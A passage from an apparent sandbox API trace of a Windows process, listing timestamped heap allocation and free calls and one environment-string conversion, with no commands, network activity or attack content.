lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4e6) returned 0x5e8ae0 [0277.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x5e8ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0277.064] FreeEnvironmentStringsW (penv=0x5e8100) returned 1 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x118) returned 0x5d9ed0 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1f) returned 0x5db830 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5d98f0 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x31) returned 0x5d4fa0 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e0770 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x31) returned 0x5d4fe0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x5d9c20 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5db860 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd) returned 0x5d3fb0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1d) returned 0x5db290 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x31) returned 0x5d5020 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x15) returned 0x5d5060 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5d4090 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x5d25f0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x69) returned 0x5d3eb0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5e08b0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1d) returned 0x5db890 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5e0540 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5d3f30 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5d3f50 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x5db2c0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5db920 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x5dba20 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5db440 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6b) returned 0x5dba60 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5d3f70 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xf) returned 0x5dbae0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x5d8d00 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x5e84d0 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x5e8650 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5d8d20 [0277.065] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x21) returned 0x5db2f0 [0277.066] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x5e9360 [0277.066] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x22) returned 0x5db5f0 [0277.066] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5e9180 [0277.066] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8ae0 | out: hHeap=0x5d0000) returned 1 [0277.066] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa3a7) returned 0x5e93e0 [0277.068] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5db320 [0277.068] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa3a7) returned 0x5f3790 [0277.070] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.070] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfef7) returned 0x5fdb40 [0277.074] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x5e04a0 [0277.074] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfef7) returned 0x60da40 [0277.075] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5db320 | out: hHeap=0x5d0000) returned 1 [0277.075] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fdb40 | out: hHeap=0x5d0000) returned 1 [0277.076] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x450) returned 0x5e8910 [0277.076] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x450) returned 0x61d940 [0277.076] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.077] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ea7) returned 0x61dda0 [0277.077] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xf40) returned 0x5e93e0 [0277.077] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7a0) returned 0x5ea330 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dda0 | out: hHeap=0x5d0000) returned 1 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xbf0) returned 0x5e93e0 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea330 | out: hHeap=0x5d0000) returned 1 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x640) returned 0x5e8910 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1247) returned 0x61d940 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x520) returned 0x5e8910 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1b56) returned 0x5e93e0 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.078] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8a0) returned 0x61d940 [0277.078] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x28ed) returned 0x5eaf40 [0277.081] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.081] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.081] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x550) returned 0x5e8910 [0277.081] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.081] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2537) returned 0x61d940 [0277.081] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12b7) returned 0x5e93e0 [0277.082] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x950) returned 0x5ed840 [0277.082] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.082] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.082] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3d4f) returned 0x5ee1a0 [0277.083] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5eaf40 | out: hHeap=0x5d0000) returned 1 [0277.083] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ed840 | out: hHeap=0x5d0000) returned 1 [0277.083] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2377) returned 0x61d940 [0277.083] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x11d7) returned 0x5f1f00 [0277.083] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8e0) returned 0x5e93e0 [0277.084] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.084] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f1f00 | out: hHeap=0x5d0000) returned 1 [0277.084] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.084] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5b0) returned 0x5e8910 [0277.084] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.084] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x640) returned 0x5e8910 [0277.084] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5be2) returned 0x5fdb40 [0277.085] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ee1a0 | out: hHeap=0x5d0000) returned 1 [0277.085] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.085] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x890) returned 0x61d940 [0277.085] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.085] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xac0) returned 0x61d940 [0277.085] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.085] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5db320 [0277.085] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x960) returned 0x61d940 [0277.085] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x960) returned 0x61e2b0 [0277.085] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.085] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x460) returned 0x5e8910 [0277.086] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe0f) returned 0x61ec20 [0277.086] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61e2b0 | out: hHeap=0x5d0000) returned 1 [0277.086] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.086] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c17) returned 0x603730 [0277.086] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe00) returned 0x61d940 [0277.086] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x700) returned 0x605350 [0277.087] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x603730 | out: hHeap=0x5d0000) returned 1 [0277.087] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.087] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x153d) returned 0x603730 [0277.087] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61ec20 | out: hHeap=0x5d0000) returned 1 [0277.087] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605350 | out: hHeap=0x5d0000) returned 1 [0277.087] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2277) returned 0x61d940 [0277.087] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1157) returned 0x604c80 [0277.088] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8a0) returned 0x605de0 [0277.088] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.088] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x604c80 | out: hHeap=0x5d0000) returned 1 [0277.088] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1fc7) returned 0x61d940 [0277.088] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x603730 | out: hHeap=0x5d0000) returned 1 [0277.088] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605de0 | out: hHeap=0x5d0000) returned 1 [0277.088] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1657) returned 0x603730 [0277.088] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xb20) returned 0x604d90 [0277.088] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x590) returned 0x61f910 [0277.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x603730 | out: hHeap=0x5d0000) returned 1 [0277.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x604d90 | out: hHeap=0x5d0000) returned 1 [0277.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2f96) returned 0x603730 [0277.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61f910 | out: hHeap=0x5d0000) returned 1 [0277.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2b47) returned 0x6066d0 [0277.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x15b7) returned 0x61d940 [0277.090] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xad0) returned 0x61ef00 [0277.090] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6066d0 | out: hHeap=0x5d0000) returned 1 [0277.090] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.090] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61ef00 | out: hHeap=0x5d0000) returned 1 [0277.090] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2697) returned 0x6066d0 [0277.090] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1367) returned 0x61d940 [0277.090] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9a0) returned 0x61ecb0 [0277.091] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6066d0 | out: hHeap=0x5d0000) returned 1 [0277.091] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.091] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x474d) returned 0x6066d0 [0277.091] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x603730 | out: hHeap=0x5d0000) returned 1 [0277.202] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61ecb0 | out: hHeap=0x5d0000) returned 1 [0277.202] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x920) returned 0x61d940 [0277.202] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.202] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1b47) returned 0x61d940 [0277.202] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xd90) returned 0x60ae30 [0277.203] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6d0) returned 0x61f490 [0277.203] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.203] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ae30 | out: hHeap=0x5d0000) returned 1 [0277.203] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5d0000) returned 1 [0277.203] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5d0) returned 0x5e8910 [0277.203] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6adf) returned 0x5e93e0 [0277.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6066d0 | out: hHeap=0x5d0000) returned 1 [0277.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.204] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1887) returned 0x61d940 [0277.204] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc30) returned 0x61f1d0 [0277.204] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x620) returned 0x5e8910 [0277.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61f1d0 | out: hHeap=0x5d0000) returned 1 [0277.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.205] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8f0) returned 0x61d940 [0277.205] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x480) returned 0x5e8910 [0277.205] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x240) returned 0x61e240 [0277.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61e240 | out: hHeap=0x5d0000) returned 1 [0277.205] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x5e0ea0 [0277.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5db320 | out: hHeap=0x5d0000) returned 1 [0277.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fdb40 | out: hHeap=0x5d0000) returned 1 [0277.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.207] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e0ea0 | out: hHeap=0x5d0000) returned 1 [0277.207] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9900) returned 0x5e93e0 [0277.208] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1bf0) returned 0x61d940 [0277.210] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.210] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9937) returned 0x5fdb40 [0277.212] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.212] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5db320 [0277.212] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9900) returned 0x5e93e0 [0277.212] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1bf0) returned 0x61d940 [0277.212] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0277.212] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9937) returned 0x61d940 [0277.213] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e93e0 | out: hHeap=0x5d0000) returned 1 [0277.214] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x5e00e0 [0277.214] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5db320 | out: hHeap=0x5d0000) returned 1 [0277.214] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f3790 | out: hHeap=0x5d0000) returned 1 [0277.215] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60da40 | out: hHeap=0x5d0000) returned 1 [0277.215] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e04a0 | out: hHeap=0x5d0000) returned 1 [0277.215] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x5e93e0 [0277.215] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x607480 [0277.215] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5d8d40 [0277.216] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x627280 [0277.216] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e92e0 [0277.216] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5d8d40 | out: hHeap=0x5d0000) returned 1 [0277.216] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x63a490 [0277.217] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e9020 [0277.217] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e92e0 | out: hHeap=0x5d0000) returned 1 [0277.218] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x64d6a0 [0277.218] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5db410 [0277.218] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e9020 | out: hHeap=0x5d0000) returned 1 [0277.218] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x6608b0 [0277.219] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x30) returned 0x5e83d0 [0277.219] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5db410 | out: hHeap=0x5d0000) returned 1 [0277.219] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x673ac0 [0277.220] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x686cd0 [0277.220] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x48) returned 0x5e0ae0 [0277.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e83d0 | out: hHeap=0x5d0000) returned 1 [0277.220] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x699ee0 [0277.221] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x6ad0f0 [0277.222] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1df0080 [0277.223] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x68) returned 0x5d8d40 [0277.223] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e0ae0 | out: hHeap=0x5d0000) returned 1 [0277.223] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e03290 [0277.224] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e164a0 [0277.224] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e296b0 [0277.225] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e3c8c0 [0277.225] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x98) returned 0x5d50b0 [0277.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5d8d40 | out: hHeap=0x5d0000) returned 1 [0277.225] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e4fad0 [0277.226] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e62ce0 [0277.226] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e75ef0 [0277.227] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e89100 [0277.228] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1e9c310 [0277.228] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1eaf520 [0277.229] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe0) returned 0x5d4ce0 [0277.229] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5d50b0 | out: hHeap=0x5d0000) returned 1 [0277.229] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1ec2730 [0277.229] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1ef0080 [0277.230] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f03290 [0277.231] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f164a0 [0277.231] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f296b0 [0277.232] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f3c8c0 [0277.232] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f4fad0 [0277.233] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f62ce0 [0277.233] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f75ef0 [0277.234] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x150) returned 0x5db0b0 [0277.234] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5d4ce0 | out: hHeap=0x5d0000) returned 1 [0277.234] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f89100 [0277.234] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1f9c310 [0277.235] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1faf520 [0277.235] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1fc2730 [0277.235] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1fd5940 [0277.236] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1fe8b50 [0277.236] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x1ffbd60 